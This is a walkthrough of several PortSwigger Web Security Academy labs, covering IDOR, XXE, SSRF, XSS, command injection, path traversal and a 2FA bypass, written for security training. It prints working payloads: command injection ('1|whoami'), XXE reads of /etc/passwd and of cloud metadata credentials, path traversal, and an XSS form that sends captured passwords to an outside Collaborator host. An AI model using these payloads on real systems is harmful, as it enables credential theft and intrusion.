PortSwigger Labs

PortSwigger Labs

Insecure direct object references IDOR

1: Register your account on PortSwigger.

Website: https://portswigger.net/users/register

2: Open the Lab: Insecure direct object references.

Website: https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references

3: Access the LAB.

4: Select the Live chat tab.

5: Open the Burp Suite.

6: On the Intercept.

7: Second, a message, and then select View transcript.

8: Refresh the Live Chat page.

Shortcut key: f5

9: View the transcript.

10: Send to the Repeater.

Shortcutkey: ctrl + r

11: Send the data.

12: Follow the redirection.

13: Change the Parameter and find the password.

Note: Remove the 3.txt and add the 1.txt.

14: The password is?

Password: hl86m5x4uyvuai88ox6p

15: Off the Intercept.

16: Log in to the account.

17: The Username and Password?

Username: carlos

Password: hl86m5x4uyvuai88ox6p

18: The LAB has been completed.

Excessive trust in client-side controls

1: Access the Lab: Excessive trust in client-side controls.

Website: https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls

2: Log in to the account.

3: The Username and Password?

Username: wiener

Password: peter

4: Open the Burp Suite and On the Intercept.

5: Buy the Lightweight “l33t” Leather Jacket.

6: Add to the cart product.

7: Send to the Repeater.

Shortcut: ctrl + r

8: Off the Intercept.

10: Go to the Add to card and check the Lightweight “l33t” Leather Jacket price.

11: The Lightweight “l33t” Leather Jacket price is $1227.00.

12: Reduce the Lightweight “l33t” Leather Jacket price in the Burp Suite and send the response.

13: Refresh the Add to card page.

Shortcut key: f5

14: The price of the Lightweight “l33t” Leather Jacket has been reduced.

15: Place the order.

16: The order has been placed.

17: LAB has been completed.

Unprotected admin functionality with unpredictable URL

1: Access the Lab: Unprotected admin functionality with unpredictable URL.

Website: https://portswigger.net/web-security/access-control/lab-unprotected-admin-functionality-with-unpredictable-url

2: Open the View page source.

Shortcut key: Ctrl + U

3: Search for the admin in the View page source code.

Shortcut key: Ctrl + F

4: Go to the My account.

5: Access the Admin Panel.

6: Delete the carlos user.

7: The LAB has been solved.

OS command injection simple case

1: Access the LAB.

Website: https://portswigger.net/web-security/os-command-injection/lab-simple

2: Open the Burp Suite and on the Intercept.

3: Open the Product.

4: Check the Stock.

5: Go to the Proxy and then open the HTTP history and check the POST method of the product stock.

6: Send to the Repeater.

Shortcut key: Ctrl + R

7: Modify the storeID parameter, giving it the value 1|whoami.

Example: productId=1&storeId=1|whoami

8: Off the intercept and refresh the page.

9: The LAB is completed.

Basic SSRF against the local server

1: Access the Lab.

Website: https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

2: Open the Burp Suite.

3: Open the product.

4: Check the product stock.

5: Check the Post request in the Burp Suite and check the stockApi.

6: Send the stockApi key to the Repeater.

Shortcut key: Ctrl + R

7: Remove the stockApi and Access the localhost admin panel.

8: Delete the carlos user.

9: Send the request.

10: The lab has been completed.

Stored XSS into HTML context with nothing encoded

1: Access the Lab.

Website: https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encoded

2: Open the post.

3: Enter the following payload in the comment box.

Payload: <script>alert(1)</script>

4: Enter a name, email, and website.

5: Click “Post comment”.

6: The Lab has been completed.

2FA simple bypass

1: Access the Lab.

Website: https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass

2: Go to My account.

3: Log in to the account.

Username: wiener

Password: peter

4: Check the Email client.

5: Find the security code.

6: Log in to the account.

7: Copy the my-account parameters.

Parameters: my-account

8: Log out of the current account.

9: Go to the My account.

10: Log in to the second account.

Username: carlos

Password: montoya

11: How to bypass two-factor authentication?

12: Use the /my-account parameters and bypass the two-factor authentication.

Note: Remove the login2 and paste the /my-account

11: The Lab has been completed.

Exploiting XXE using external entities to retrieve files

1: Access the Lab.

Website: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

2: Open the Burp Suite.

3: Select the product.

4: Select the Check stock.

5: Send the request to the Repeater.

Shortcut key: Ctrl + R

6: Send the request.

7: This is the XXE vulnerability.

8: Insert the XXE payload in the XXE vulnerable code.

XXE Payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM “file:///etc/passwd”> ]>

9: Send the request.

10: Replace the product ID.

Product ID: &xxe;

11: Send the Request.

12: The Lab has been completed.

Exploiting XXE to perform SSRF attacks

1: Access the Lab.

Website: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

2: Open the Burp Suite.

3: Select the product.

4: Check the stock units.

5: Send the request to the Repeater.

Shortcut key: Ctrl + R

6: Send the request.

7: Insert the following XXE payload.

Payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM “http://169.254.169.254/”> ]>

8: Replace the product ID.

Product ID: &xxe;

9: The response should contain “Invalid product ID:” followed by the response from the metadata endpoint, which will initially be a folder name.

10: Update the URL in the DTD to explore the API until you reach.

URL: /latest/meta-data/iam/security-credentials/admin

Complete URL: <!DOCTYPE test [ <!ENTITY xxe SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/admin”> ]>

11: This should return JSON containing the SecretAccessKey.

12: The Lab has been completed.

File path traversal simple case

1: Access the Lab.

Website: https://portswigger.net/web-security/file-path-traversal/lab-simple

2: Open the product.

3: Inspect the page.

4: Open the post.

5: Go to the Network and Reload the page.

6: Open the Image.

7: Modify the filename parameter.

From: https://0afa00ee04ce470ecfc3a358003d0026.web-security-academy.net/image?filename=45.jpg

To: https://0afa00ee04ce470ecfc3a358003d0026.web-security-academy.net/image?filename=../../../etc/passwd

8: The Lab has been completed.

Exploiting cross-site scripting to capture passwords

1: Access the lab.

Website: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-capturing-passwords

2: Open the Burp Suite Professional.

3: Open the post.

4: Go to the Collaborator tab in the Burp Suite Professional.

5: Copy the code from the copy to clipboard.

Code example: 7u2n0ffvckyj6w0sa6fnktdpzg5htbh0.oastify.com

6: Paste the payload in the post comment.

Payload: <input name=username id=username>

<input type=password name=password onchange=”if(this.value.length)fetch(‘https://cq6swkb08puo21wx6bbsgy9uvl1mpfd4.oastify.com’,{

method:’POST’,

mode: ‘no-cors’,

body:username.value+’:’+this.value

});”>

7: Take the captured Username and Password.

Username: administrator

Password: rlaj7751lft9s7zeh3fl

8: Go to the My account.

9: Log in to the account.

10: The lab has been completed.

HTTP request smuggling, basic CL.TE vulnerability

1: Open the Burp Suite.

2: Access the Lab HTTP request smuggling, basic CL.TE vulnerability.

Website: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

2: Send a request to the Repeater.

Shortcut: Ctrl + R

3: Remove the parameters.

4: Change the Parameters.

5: Send the request three times.

6:  Your lab has been completed.

Burp Suite